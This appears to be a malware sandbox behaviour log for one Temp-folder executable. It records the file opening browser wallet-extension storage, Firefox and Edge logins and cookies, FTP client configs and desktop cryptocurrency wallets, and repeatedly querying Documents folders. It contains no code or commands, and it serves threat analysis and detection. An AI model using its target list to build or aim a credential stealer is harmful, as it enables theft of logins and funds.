Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
